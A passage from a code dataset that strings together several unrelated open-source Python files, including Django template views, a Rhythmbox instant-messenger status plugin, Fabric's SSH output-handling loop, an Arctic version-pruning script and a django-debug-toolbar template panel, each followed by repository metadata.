<fixtures.acceptancetestsstoragemanagementclient.models.CustomDomain>`
:param secondary_endpoints: Gets the URLs that are used to perform a
retrieval of a public blob, queue or table object from the secondary
location of the storage account. Only available if the accountType is
StandardRAGRS.
:type secondary_endpoints: :class:`Endpoints
<fixtures.acceptancetestsstoragemanagementclient.models.Endpoints>`
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'location': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'ProvisioningState'},
'account_type': {'key': 'properties.accountType', 'type': 'AccountType'},
'primary_endpoints': {'key': 'properties.primaryEndpoints', 'type': 'Endpoints'},
'primary_location': {'key': 'properties.primaryLocation', 'type': 'str'},
'status_of_primary': {'key': 'properties.statusOfPrimary', 'type': 'AccountStatus'},
'last_geo_failover_time': {'key': 'properties.lastGeoFailoverTime', 'type': 'iso-8601'},
'secondary_location': {'key': 'properties.secondaryLocation', 'type': 'str'},
'status_of_secondary': {'key': 'properties.statusOfSecondary', 'type': 'AccountStatus'},
'creation_time': {'key': 'properties.creationTime', 'type': 'iso-8601'},
'custom_domain': {'key': 'properties.customDomain', 'type': 'CustomDomain'},
'secondary_endpoints': {'key': 'properties.secondaryEndpoints', 'type': 'Endpoints'},
}
def __init__(self, location, tags=None, provisioning_state=None, account_type=None, primary_endpoints=None, primary_location=None, status_of_primary=None, last_geo_failover_time=None, secondary_location=None, status_of_secondary=None, creation_time=None, custom_domain=None, secondary_endpoints=None):
super(StorageAccount, self).__init__(location=location, tags=tags)
self.provisioning_state = provisioning_state
self.account_type = account_type
self.primary_endpoints = primary_endpoints
self.primary_location = primary_location
self.status_of_primary = status_of_primary
self.last_geo_failover_time = last_geo_failover_time
self.secondary_location = secondary_location
self.status_of_secondary = status_of_secondary
self.creation_time = creation_time
self.custom_domain = custom_domain
self.secondary_endpoints = secondary_endpoints
| mit | -2,966,732,839,862,981,000 | 51.439024 | 305 | 0.686512 | false |
minimail/minimail | template_management/views.py | 1 | 3220 | from django.http.response import HttpResponse
from django.views.generic import ListView, DetailView, CreateView, UpdateView,\
DeleteView
from django.urls import reverse_lazy
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from template_management.models import Template
class TemplateList(LoginRequiredMixin, ListView):
"""TemplateList"""
model = Template
template_name = 'template_list.html'
context_object_name = 'templates'
def get_queryset(self):
return Template.objects.order_by('-created')\
.filter(author=self.request.user)
def get_context_data(self, **kwargs):
context = super(TemplateList, self).get_context_data(**kwargs)
context['public_templates'] = Template.objects.filter(is_public=True)
return context
class TemplateDetail(LoginRequiredMixin, DetailView):
"""TemplateDetail"""
model = Template
template_name = 'template_detail.html'
def get_queryset(self):
return Template.objects.filter(author=self.request.user)
def get_context_data(self, **kwargs):
context = super(TemplateDetail, self).get_context_data(**kwargs)
return context
class TemplateCreate(LoginRequiredMixin, CreateView):
"""TemplateCreate"""
model = Template
fields = ['name', 'html_template', 'text_template', 'placeholders']
template_name = 'template_new.html'
def form_valid(self, form):
form.instance.author = self.request.user
return super(TemplateCreate, self).form_valid(form)
def form_invalid(self, form):
return super(TemplateCreate, self).form_invalid(form)
class TemplateUpdate(LoginRequiredMixin, UpdateView):
"""TemplateUpdate"""
model = Template
fields = ['name', 'html_template', 'text_template', 'placeholders']
template_name = 'template_new.html'
def form_valid(self, form):
form.instance.author = self.request.user
return super(TemplateUpdate, self).form_valid(form)
def get_queryset(self):
return Template.objects.filter(author=self.request.user)
def get_context_data(self, **kwargs):
context = super(TemplateUpdate, self).get_context_data(**kwargs)
return context
class TemplateDelete(LoginRequiredMixin, DeleteView):
"""TemplateDelete"""
model = Template
success_url = reverse_lazy('template-list')
success_message = "The template was deleted successfully."
def delete(self, request, *args, **kwargs):
messages.success(self.request, self.success_message)
return super(TemplateDelete, self).delete(request, *args, **kwargs)
def get_queryset(self):
return Template.objects.filter(author=self.request.user)
def get_context_data(self, **kwargs):
context = super(TemplateDelete, self).get_context_data(**kwargs)
return context
@login_required
def show_template_preview(request, pk):
"""show_template_preview
:param request:
:param pk:
"""
template = Template.objects.get(pk=pk)
return HttpResponse(template.html_template)
| mit | 1,908,705,646,142,656,000 | 31.525253 | 79 | 0.68882 | false |
whausen/part | src/adhocracy/model/tagging.py | 6 | 2477 | from datetime import datetime
import logging
from sqlalchemy import Table, Column, Integer, ForeignKey, DateTime
import meta
log = logging.getLogger(__name__)
tagging_table = Table(
'tagging', meta.data,
Column('id', Integer, primary_key=True),
Column('create_time', DateTime, default=datetime.utcnow),
Column('tag_id', Integer, ForeignKey('tag.id'), nullable=False),
Column('delegateable_id', Integer, ForeignKey('delegateable.id'),
nullable=False),
Column('creator_id', Integer, ForeignKey('user.id'), nullable=False),
)
class Tagging(object):
def __init__(self, delegateable, tag, creator):
self.delegateable = delegateable
self.tag = tag
self.creator = creator
def __repr__(self):
tag = self.tag.name.encode('ascii', 'replace')
return "<Tagging(%s,%s,%s,%s)>" % (self.id, self.delegateable.id,
tag,
self.creator.user_name)
def delete(self):
meta.Session.delete(self)
meta.Session.flush()
@classmethod
def find_by_delegateable_name_creator(cls, delegateable, name, creator):
import adhocracy.lib.text as text
from tag import Tag
name = text.tag_normalize(name)
try:
q = meta.Session.query(Tagging)
q = q.filter(Tagging.creator == creator)
q = q.filter(Tagging.delegateable == delegateable)
q = q.join(Tag)
q = q.filter(Tag.name.like(name))
return q.limit(1).first()
except Exception, e:
log.warn("find_by_delegateable_name_creator(%s): %s" % (id, e))
return None
@classmethod
def find(cls, id, instance_filter=True, include_deleted=False):
q = meta.Session.query(Tagging)
q = q.filter(Tagging.id == id)
# TODO: Instance filtering
return q.limit(1).first()
@classmethod
def create(cls, delegateable, tag, creator):
from tag import Tag
if not isinstance(tag, Tag):
tag = Tag.find_or_create(tag)
tagging = Tagging(delegateable, tag, creator)
meta.Session.add(tagging)
meta.Session.flush()
return tagging
@classmethod
def create_all(cls, delegateable, tags, creator):
import adhocracy.lib.text as text
return [Tagging.create(delegateable, t, creator)
for t in text.tag_split(tags)]
| agpl-3.0 | -8,086,492,964,784,305,000 | 31.168831 | 76 | 0.595882 | false |
christianbecke/rhythmbox-multiple-libraries | plugins/im-status/im-status/__init__.py | 2 | 10273 | # coding: utf-8
# vim: set et sw=2:
#
# Copyright (C) 2007-2008 - Vincent Untz
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# The Rhythmbox authors hereby grant permission for non-GPL compatible
# GStreamer plugins to be used and distributed together with GStreamer
# and Rhythmbox. This permission is above and beyond the permissions granted
# by the GPL license by which Rhythmbox is covered. If you modify this code
# you may extend this exception to your version of the code, but you are not
# obligated to do so. If you do not wish to do so, delete this exception
# statement from your version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
import rhythmdb, rb
try:
import dbus
use_gossip = True
use_mc5 = True
use_purple = True
except ImportError:
use_gossip = False
use_mc5 = False
use_purple = False
NORMAL_SONG_ARTIST = 'artist'
NORMAL_SONG_TITLE = 'title'
NORMAL_SONG_ALBUM = 'album'
STREAM_SONG_ARTIST = 'rb:stream-song-artist'
STREAM_SONG_TITLE = 'rb:stream-song-title'
STREAM_SONG_ALBUM = 'rb:stream-song-album'
GOSSIP_BUS_NAME = 'org.gnome.Gossip'
GOSSIP_OBJ_PATH = '/org/gnome/Gossip'
GOSSIP_IFACE_NAME = 'org.gnome.Gossip'
PROPERTIES_IFACE_NAME = 'org.freedesktop.DBus.Properties'
MC5_BUS_NAME = 'org.freedesktop.Telepathy.MissionControl5'
MC5_AM_OBJ_PATH = '/org/freedesktop/Telepathy/AccountManager'
MC5_AM_IFACE_NAME = 'org.freedesktop.Telepathy.AccountManager'
MC5_ACCT_IFACE_NAME = 'org.freedesktop.Telepathy.Account'
PURPLE_BUS_NAME = 'im.pidgin.purple.PurpleService'
PURPLE_OBJ_PATH = '/im/pidgin/purple/PurpleObject'
PURPLE_IFACE_NAME = 'im.pidgin.purple.PurpleInterface'
class IMStatusPlugin (rb.Plugin):
def __init__ (self):
rb.Plugin.__init__ (self)
def activate (self, shell):
self.shell = shell
sp = shell.get_player ()
self.psc_id = sp.connect ('playing-song-changed',
self.playing_entry_changed)
self.pc_id = sp.connect ('playing-changed',
self.playing_changed)
self.pspc_id = sp.connect ('playing-song-property-changed',
self.playing_song_property_changed)
self.current_entry = None
self.current_artist = None
self.current_title = None
self.current_album = None
self.save_status ()
if sp.get_playing ():
self.set_entry (sp.get_playing_entry ())
def deactivate (self, shell):
self.shell = None
sp = shell.get_player ()
sp.disconnect (self.psc_id)
sp.disconnect (self.pc_id)
sp.disconnect (self.pspc_id)
if self.current_entry is not None:
self.restore_status ()
def playing_changed (self, sp, playing):
if playing:
self.set_entry (sp.get_playing_entry ())
else:
self.current_entry = None
self.restore_status ()
def playing_entry_changed (self, sp, entry):
if sp.get_playing ():
self.set_entry (entry)
def playing_song_property_changed (self, sp, uri, property, old, new):
relevant = False
if sp.get_playing () and property in (NORMAL_SONG_ARTIST, STREAM_SONG_ARTIST):
self.current_artist = new
relevant = True
elif sp.get_playing () and property in (NORMAL_SONG_TITLE, STREAM_SONG_TITLE):
self.current_title = new
relevant = True
elif sp.get_playing () and property in (NORMAL_SONG_ALBUM, STREAM_SONG_ALBUM):
self.current_album = new
relevant = True
if relevant:
self.set_status ()
def set_entry (self, entry):
if entry == self.current_entry:
return
if self.current_entry == None:
self.save_status ()
self.current_entry = entry
if entry is None:
self.restore_status ()
return
self.set_status_from_entry ()
def set_status_from_entry (self):
db = self.shell.get_property ("db")
self.current_artist = db.entry_get (self.current_entry, rhythmdb.PROP_ARTIST)
self.current_title = db.entry_get (self.current_entry, rhythmdb.PROP_TITLE)
self.current_album = db.entry_get (self.current_entry, rhythmdb.PROP_ALBUM)
if self.current_entry.get_entry_type().category == rhythmdb.ENTRY_STREAM:
if not self.current_artist:
self.current_artist = db.entry_request_extra_metadata (self.current_entry, STREAM_SONG_ARTIST)
if not self.current_title:
self.current_title = db.entry_request_extra_metadata (self.current_entry, STREAM_SONG_TITLE)
if not self.current_album:
self.current_album = db.entry_request_extra_metadata (self.current_entry, STREAM_SONG_ALBUM)
self.set_status ()
def set_status (self):
subs = {
'artist': self.current_artist,
'album': self.current_album,
'title': self.current_title
}
if self.current_artist:
if self.current_title:
# Translators: do not translate %(artist)s or %(title)s, they are
# string substitution markers (like %s) for the artist and title of
# the current playing song. They can be reordered if necessary.
new_status = _(u"♫ %(artist)s - %(title)s ♫") % subs
elif self.current_album:
# Translators: do not translate %(artist)s or %(album)s, they are
# string substitution markers (like %s) for the artist and album name
# of the current playing song. They can be reordered if necessary.
new_status = _(u"♫ %(artist)s - %(album)s ♫") % subs
elif self.current_album:
# Translators: do not translate %(album)s, it is a string substitution
# marker (like %s) for the album name of the current playing song.
new_status = _(u"♫ %(album)s ♫") % subs
elif self.current_title:
# Translators: do not translate %(title)s, it is a string substitution
# marker (like %s) for the title of the current playing song.
new_status = _(u"♫ %(title)s ♫") % subs
else:
new_status = _(u"♫ Listening to music... ♫")
self.set_gossip_status (new_status)
self.set_mc5_status (new_status)
self.set_purple_status (new_status)
def save_status (self):
self.saved_gossip = self.get_gossip_status ()
self.saved_mc5 = self.get_mc5_status ()
self.saved_purple = self.get_purple_status ()
def restore_status (self):
if self.saved_gossip != None:
self.set_gossip_status (self.saved_gossip)
if self.saved_mc5 != None:
self.set_mc5_status (self.saved_mc5)
if self.saved_purple != None:
self.set_purple_status (self.saved_purple)
def set_gossip_status (self, new_status):
if not use_gossip:
return
try:
bus = dbus.SessionBus ()
gossip_obj = bus.get_object (GOSSIP_BUS_NAME, GOSSIP_OBJ_PATH)
gossip = dbus.Interface (gossip_obj, GOSSIP_IFACE_NAME)
state, status = gossip.GetPresence ("")
gossip.SetPresence (state, new_status)
except dbus.DBusException:
pass
def get_gossip_status (self):
if not use_gossip:
return
try:
bus = dbus.SessionBus ()
gossip_obj = bus.get_object (GOSSIP_BUS_NAME, GOSSIP_OBJ_PATH)
gossip = dbus.Interface (gossip_obj, GOSSIP_IFACE_NAME)
state, status = gossip.GetPresence ("")
return status
except dbus.DBusException:
return None
def set_mc5_status (self, new_status):
if not use_mc5:
return
try:
bus = dbus.SessionBus ()
am_obj = bus.get_object (MC5_BUS_NAME, MC5_AM_OBJ_PATH)
am = dbus.Interface (am_obj, PROPERTIES_IFACE_NAME)
for acct in am.Get (MC5_AM_IFACE_NAME, "ValidAccounts"):
acct_obj = bus.get_object (MC5_BUS_NAME, acct)
acct_iface = dbus.Interface (acct_obj, PROPERTIES_IFACE_NAME)
status = acct_iface.Get (MC5_ACCT_IFACE_NAME, "RequestedPresence")
acct_iface.Set (MC5_ACCT_IFACE_NAME, "RequestedPresence", (status[0], status[1], new_status))
except dbus.DBusException, e:
print "dbus exception while setting status: " + str(e)
def get_mc5_status (self):
if not use_mc5:
return
try:
bus = dbus.SessionBus ()
am_obj = bus.get_object (MC5_BUS_NAME, MC5_AM_OBJ_PATH)
am = dbus.Interface (am_obj, PROPERTIES_IFACE_NAME)
got_status = False
# a bit awful: this just returns the status text from the first account
# that has one.
for acct in am.Get (MC5_AM_IFACE_NAME, "ValidAccounts"):
acct_obj = bus.get_object (MC5_BUS_NAME, acct)
acct_iface = dbus.Interface (acct_obj, PROPERTIES_IFACE_NAME)
status = acct_iface.Get (MC5_ACCT_IFACE_NAME, "RequestedPresence")
got_status = True
if status[2] != "":
return status[2]
# if all accounts have empty status, return that
if got_status:
return ""
except dbus.DBusException, e:
print "dbus exception while getting status: " + str(e)
return None
def set_purple_status (self, new_status):
if not use_purple:
return
try:
bus = dbus.SessionBus ()
purple_obj = bus.get_object (PURPLE_BUS_NAME, PURPLE_OBJ_PATH)
purple = dbus.Interface (purple_obj, PURPLE_IFACE_NAME)
status = purple.PurpleSavedstatusGetCurrent ()
purple.PurpleSavedstatusSetMessage (status, new_status)
purple.PurpleSavedstatusActivate (status)
except dbus.DBusException:
pass
def get_purple_status (self):
if not use_purple:
return
try:
bus = dbus.SessionBus ()
purple_obj = bus.get_object (PURPLE_BUS_NAME, PURPLE_OBJ_PATH)
purple = dbus.Interface (purple_obj, PURPLE_IFACE_NAME)
current = purple.PurpleSavedstatusGetCurrent ()
status = purple.PurpleSavedstatusGetMessage (current)
return status
except dbus.DBusException:
return None
| gpl-2.0 | -6,244,222,777,913,569,000 | 33.40604 | 102 | 0.662538 | false |
eshijia/magnum | magnum/common/pythonk8sclient/swagger_client/models/v1_secret_list.py | 5 | 5135 | # coding: utf-8
"""
Copyright 2015 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
class V1SecretList(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
Swagger model
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'kind': 'str',
'api_version': 'str',
'metadata': 'V1ListMeta',
'items': 'list[V1Secret]'
}
self.attribute_map = {
'kind': 'kind',
'api_version': 'apiVersion',
'metadata': 'metadata',
'items': 'items'
}
self._kind = None
self._api_version = None
self._metadata = None
self._items = None
@property
def kind(self):
"""
Gets the kind of this V1SecretList.
kind of object, in CamelCase; cannot be updated; see http://releases.k8s.io/v1.0.4/docs/api-conventions.md#types-kinds
:return: The kind of this V1SecretList.
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""
Sets the kind of this V1SecretList.
kind of object, in CamelCase; cannot be updated; see http://releases.k8s.io/v1.0.4/docs/api-conventions.md#types-kinds
:param kind: The kind of this V1SecretList.
:type: str
"""
self._kind = kind
@property
def api_version(self):
"""
Gets the api_version of this V1SecretList.
version of the schema the object should have; see http://releases.k8s.io/v1.0.4/docs/api-conventions.md#resources
:return: The api_version of this V1SecretList.
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""
Sets the api_version of this V1SecretList.
version of the schema the object should have; see http://releases.k8s.io/v1.0.4/docs/api-conventions.md#resources
:param api_version: The api_version of this V1SecretList.
:type: str
"""
self._api_version = api_version
@property
def metadata(self):
"""
Gets the metadata of this V1SecretList.
standard list metadata; see http://releases.k8s.io/v1.0.4/docs/api-conventions.md#metadata
:return: The metadata of this V1SecretList.
:rtype: V1ListMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""
Sets the metadata of this V1SecretList.
standard list metadata; see http://releases.k8s.io/v1.0.4/docs/api-conventions.md#metadata
:param metadata: The metadata of this V1SecretList.
:type: V1ListMeta
"""
self._metadata = metadata
@property
def items(self):
"""
Gets the items of this V1SecretList.
items is a list of secret objects; see http://releases.k8s.io/v1.0.4/docs/secrets.md
:return: The items of this V1SecretList.
:rtype: list[V1Secret]
"""
return self._items
@items.setter
def items(self, items):
"""
Sets the items of this V1SecretList.
items is a list of secret objects; see http://releases.k8s.io/v1.0.4/docs/secrets.md
:param items: The items of this V1SecretList.
:type: list[V1Secret]
"""
self._items = items
def to_dict(self):
"""
Return model properties dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
else:
result[attr] = value
return result
def to_str(self):
"""
Return model properties str
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
| apache-2.0 | -1,367,728,650,382,144,300 | 28.511494 | 126 | 0.576047 | false |
manahl/arctic | arctic/scripts/arctic_prune_versions.py | 1 | 2253 | from __future__ import print_function
import logging
import optparse
import pymongo
from .utils import do_db_auth, setup_logging
from ..arctic import Arctic, ArcticLibraryBinding
from ..hooks import get_mongodb_uri
logger = logging.getLogger(__name__)
def prune_versions(lib, symbols, keep_mins):
logger.info("Fixing snapshot pointers")
lib._cleanup_orphaned_versions(dry_run=False)
for symbol in symbols:
logger.info("Pruning %s" % symbol)
lib._prune_previous_versions(symbol, keep_mins=keep_mins)
def main():
usage = """usage: %prog [options]
Prunes (i.e. deletes) versions of data that are not the most recent, and are older than 10 minutes,
and are not in use by snapshots. Must be used on a Arctic VersionStore library instance.
Example:
arctic_prune_versions --host=hostname --library=arctic_jblackburn.my_library
"""
setup_logging()
parser = optparse.OptionParser(usage=usage)
parser.add_option("--host", default='localhost', help="Hostname, or clustername. Default: localhost")
parser.add_option("--library", help="The name of the library. e.g. 'arctic_jblackburn.library'")
parser.add_option("--symbols", help="The symbols to prune - comma separated (default all)")
parser.add_option("--keep-mins", default=10, help="Ensure there's a version at least keep-mins old. Default:10")
(opts, _) = parser.parse_args()
if not opts.library:
parser.error('Must specify the Arctic library e.g. arctic_jblackburn.library!')
db_name, _ = ArcticLibraryBinding._parse_db_lib(opts.library)
print("Pruning (old) versions in : %s on mongo %s" % (opts.library, opts.host))
print("Keeping all versions <= %s mins old" % (opts.keep_mins))
c = pymongo.MongoClient(get_mongodb_uri(opts.host))
if not do_db_auth(opts.host, c, db_name):
logger.error('Authentication Failed. Exiting.')
return
lib = Arctic(c)[opts.library]
if opts.symbols:
symbols = opts.symbols.split(',')
else:
symbols = lib.list_symbols(all_symbols=True)
logger.info("Found %s symbols" % len(symbols))
prune_versions(lib, symbols, opts.keep_mins)
logger.info("Done")
if __name__ == '__main__':
main()
| lgpl-2.1 | 2,199,328,562,808,808,400 | 33.136364 | 116 | 0.676875 | false |
bitmonk/fabric | fabric/io.py | 25 | 9677 | from __future__ import with_statement
import sys
import time
import re
import socket
from select import select
from fabric.state import env, output, win32
from fabric.auth import get_password, set_password
import fabric.network
from fabric.network import ssh, normalize
from fabric.utils import RingBuffer
from fabric.exceptions import CommandTimeout
if win32:
import msvcrt
def _endswith(char_list, substring):
tail = char_list[-1 * len(substring):]
substring = list(substring)
return tail == substring
def _has_newline(bytelist):
return '\r' in bytelist or '\n' in bytelist
def output_loop(*args, **kwargs):
OutputLooper(*args, **kwargs).loop()
class OutputLooper(object):
def __init__(self, chan, attr, stream, capture, timeout):
self.chan = chan
self.stream = stream
self.capture = capture
self.timeout = timeout
self.read_func = getattr(chan, attr)
self.prefix = "[%s] %s: " % (
env.host_string,
"out" if attr == 'recv' else "err"
)
self.printing = getattr(output, 'stdout' if (attr == 'recv') else 'stderr')
self.linewise = (env.linewise or env.parallel)
self.reprompt = False
self.read_size = 4096
self.write_buffer = RingBuffer([], maxlen=len(self.prefix))
def _flush(self, text):
self.stream.write(text)
# Actually only flush if not in linewise mode.
# When linewise is set (e.g. in parallel mode) flushing makes
# doubling-up of line prefixes, and other mixed output, more likely.
if not env.linewise:
self.stream.flush()
self.write_buffer.extend(text)
def loop(self):
"""
Loop, reading from <chan>.<attr>(), writing to <stream> and buffering to <capture>.
Will raise `~fabric.exceptions.CommandTimeout` if network timeouts
continue to be seen past the defined ``self.timeout`` threshold.
(Timeouts before then are considered part of normal short-timeout fast
network reading; see Fabric issue #733 for background.)
"""
# Internal capture-buffer-like buffer, used solely for state keeping.
# Unlike 'capture', nothing is ever purged from this.
_buffer = []
# Initialize loop variables
initial_prefix_printed = False
seen_cr = False
line = []
# Allow prefix to be turned off.
if not env.output_prefix:
self.prefix = ""
start = time.time()
while True:
# Handle actual read
try:
bytelist = self.read_func(self.read_size)
except socket.timeout:
elapsed = time.time() - start
if self.timeout is not None and elapsed > self.timeout:
raise CommandTimeout(timeout=self.timeout)
continue
# Empty byte == EOS
if bytelist == '':
# If linewise, ensure we flush any leftovers in the buffer.
if self.linewise and line:
self._flush(self.prefix)
self._flush("".join(line))
break
# A None capture variable implies that we're in open_shell()
if self.capture is None:
# Just print directly -- no prefixes, no capturing, nada
# And since we know we're using a pty in this mode, just go
# straight to stdout.
self._flush(bytelist)
# Otherwise, we're in run/sudo and need to handle capturing and
# prompts.
else:
# Print to user
if self.printing:
printable_bytes = bytelist
# Small state machine to eat \n after \r
if printable_bytes[-1] == "\r":
seen_cr = True
if printable_bytes[0] == "\n" and seen_cr:
printable_bytes = printable_bytes[1:]
seen_cr = False
while _has_newline(printable_bytes) and printable_bytes != "":
# at most 1 split !
cr = re.search("(\r\n|\r|\n)", printable_bytes)
if cr is None:
break
end_of_line = printable_bytes[:cr.start(0)]
printable_bytes = printable_bytes[cr.end(0):]
if not initial_prefix_printed:
self._flush(self.prefix)
if _has_newline(end_of_line):
end_of_line = ''
if self.linewise:
self._flush("".join(line) + end_of_line + "\n")
line = []
else:
self._flush(end_of_line + "\n")
initial_prefix_printed = False
if self.linewise:
line += [printable_bytes]
else:
if not initial_prefix_printed:
self._flush(self.prefix)
initial_prefix_printed = True
self._flush(printable_bytes)
# Now we have handled printing, handle interactivity
read_lines = re.split(r"(\r|\n|\r\n)", bytelist)
for fragment in read_lines:
# Store in capture buffer
self.capture += fragment
# Store in internal buffer
_buffer += fragment
# Handle prompts
expected, response = self._get_prompt_response()
if expected:
del self.capture[-1 * len(expected):]
self.chan.sendall(str(response) + '\n')
else:
prompt = _endswith(self.capture, env.sudo_prompt)
try_again = (_endswith(self.capture, env.again_prompt + '\n')
or _endswith(self.capture, env.again_prompt + '\r\n'))
if prompt:
self.prompt()
elif try_again:
self.try_again()
# Print trailing new line if the last thing we printed was our line
# prefix.
if self.prefix and "".join(self.write_buffer) == self.prefix:
self._flush('\n')
def prompt(self):
# Obtain cached password, if any
password = get_password(*normalize(env.host_string))
# Remove the prompt itself from the capture buffer. This is
# backwards compatible with Fabric 0.9.x behavior; the user
# will still see the prompt on their screen (no way to avoid
# this) but at least it won't clutter up the captured text.
del self.capture[-1 * len(env.sudo_prompt):]
# If the password we just tried was bad, prompt the user again.
if (not password) or self.reprompt:
# Print the prompt and/or the "try again" notice if
# output is being hidden. In other words, since we need
# the user's input, they need to see why we're
# prompting them.
if not self.printing:
self._flush(self.prefix)
if self.reprompt:
self._flush(env.again_prompt + '\n' + self.prefix)
self._flush(env.sudo_prompt)
# Prompt for, and store, password. Give empty prompt so the
# initial display "hides" just after the actually-displayed
# prompt from the remote end.
self.chan.input_enabled = False
password = fabric.network.prompt_for_password(
prompt=" ", no_colon=True, stream=self.stream
)
self.chan.input_enabled = True
# Update env.password, env.passwords if necessary
user, host, port = normalize(env.host_string)
set_password(user, host, port, password)
# Reset reprompt flag
self.reprompt = False
# Send current password down the pipe
self.chan.sendall(password + '\n')
def try_again(self):
# Remove text from capture buffer
self.capture = self.capture[:len(env.again_prompt)]
# Set state so we re-prompt the user at the next prompt.
self.reprompt = True
def _get_prompt_response(self):
"""
Iterate through the request prompts dict and return the response and
original request if we find a match
"""
for tup in env.prompts.iteritems():
if _endswith(self.capture, tup[0]):
return tup
return None, None
def input_loop(chan, using_pty):
while not chan.exit_status_ready():
if win32:
have_char = msvcrt.kbhit()
else:
r, w, x = select([sys.stdin], [], [], 0.0)
have_char = (r and r[0] == sys.stdin)
if have_char and chan.input_enabled:
# Send all local stdin to remote end's stdin
byte = msvcrt.getch() if win32 else sys.stdin.read(1)
chan.sendall(byte)
# Optionally echo locally, if needed.
if not using_pty and env.echo_stdin:
# Not using fastprint() here -- it prints as 'user'
# output level, don't want it to be accidentally hidden
sys.stdout.write(byte)
sys.stdout.flush()
time.sleep(ssh.io_sleep)
| bsd-2-clause | -2,421,830,554,437,730,300 | 38.823045 | 91 | 0.530226 | false |
umitproject/openmonitor-aggregator | build/django-debug-toolbar/debug_toolbar/panels/template.py | 12 | 5970 | from os.path import normpath
from pprint import pformat
from django import http
from django.conf import settings
from django.template.context import get_standard_processors
from django.test.signals import template_rendered
from django.utils.translation import ugettext_lazy as _
from django.db.models.query import QuerySet
from debug_toolbar.panels import DebugPanel
from debug_toolbar.utils.tracking.db import recording, SQLQueryTriggered
# Code taken and adapted from Simon Willison and Django Snippets:
# http://www.djangosnippets.org/snippets/766/
# Monkeypatch instrumented test renderer from django.test.utils - we could use
# django.test.utils.setup_test_environment for this but that would also set up
# e-mail interception, which we don't want
from django.test.utils import instrumented_test_render
from django.template import Template
if not hasattr(Template, '_render'): # Django < 1.2
if Template.render != instrumented_test_render:
Template.original_render = Template.render
Template.render = instrumented_test_render
else:
if Template._render != instrumented_test_render:
Template.original_render = Template._render
Template._render = instrumented_test_render
# MONSTER monkey-patch
old_template_init = Template.__init__
def new_template_init(self, template_string, origin=None, name='<Unknown Template>'):
old_template_init(self, template_string, origin, name)
self.origin = origin
Template.__init__ = new_template_init
class TemplateDebugPanel(DebugPanel):
"""
A panel that lists all templates used during processing of a response.
"""
name = 'Template'
template = 'debug_toolbar/panels/templates.html'
has_content = True
def __init__(self, *args, **kwargs):
super(TemplateDebugPanel, self).__init__(*args, **kwargs)
self.templates = []
template_rendered.connect(self._store_template_info)
def _store_template_info(self, sender, **kwargs):
t = kwargs['template']
if t.name and t.name.startswith('debug_toolbar/'):
return # skip templates that we are generating through the debug toolbar.
context_data = kwargs['context']
context_list = []
for context_layer in context_data.dicts:
temp_layer = {}
if hasattr(context_layer, 'items'):
for key, value in context_layer.items():
# Replace any request elements - they have a large
# unicode representation and the request data is
# already made available from the Request Vars panel.
if isinstance(value, http.HttpRequest):
temp_layer[key] = '<<request>>'
# Replace the debugging sql_queries element. The SQL
# data is already made available from the SQL panel.
elif key == 'sql_queries' and isinstance(value, list):
temp_layer[key] = '<<sql_queries>>'
# Replace LANGUAGES, which is available in i18n context processor
elif key == 'LANGUAGES' and isinstance(value, tuple):
temp_layer[key] = '<<languages>>'
# QuerySet would trigger the database: user can run the query from SQL Panel
elif isinstance(value, QuerySet):
model_name = "%s.%s" % (value.model._meta.app_label, value.model.__name__)
temp_layer[key] = '<<queryset of %s>>' % model_name
else:
try:
recording(False)
pformat(value) # this MAY trigger a db query
except SQLQueryTriggered:
temp_layer[key] = '<<triggers database query>>'
except UnicodeEncodeError:
temp_layer[key] = '<<unicode encode error>>'
else:
temp_layer[key] = value
finally:
recording(True)
try:
context_list.append(pformat(temp_layer))
except UnicodeEncodeError:
pass
kwargs['context'] = context_list
self.templates.append(kwargs)
def nav_title(self):
return _('Templates')
def title(self):
num_templates = len(self.templates)
return _('Templates (%(num_templates)s rendered)') % {'num_templates': num_templates}
def url(self):
return ''
def process_request(self, request):
self.request = request
def process_response(self, request, response):
context_processors = dict(
[
("%s.%s" % (k.__module__, k.__name__),
pformat(k(self.request))) for k in get_standard_processors()
]
)
template_context = []
for template_data in self.templates:
info = {}
# Clean up some info about templates
template = template_data.get('template', None)
if not hasattr(template, 'origin'):
continue
if template.origin and template.origin.name:
template.origin_name = template.origin.name
else:
template.origin_name = 'No origin'
info['template'] = template
# Clean up context for better readability
if getattr(settings, 'DEBUG_TOOLBAR_CONFIG', {}).get('SHOW_TEMPLATE_CONTEXT', True):
context_list = template_data.get('context', [])
info['context'] = '\n'.join(context_list)
template_context.append(info)
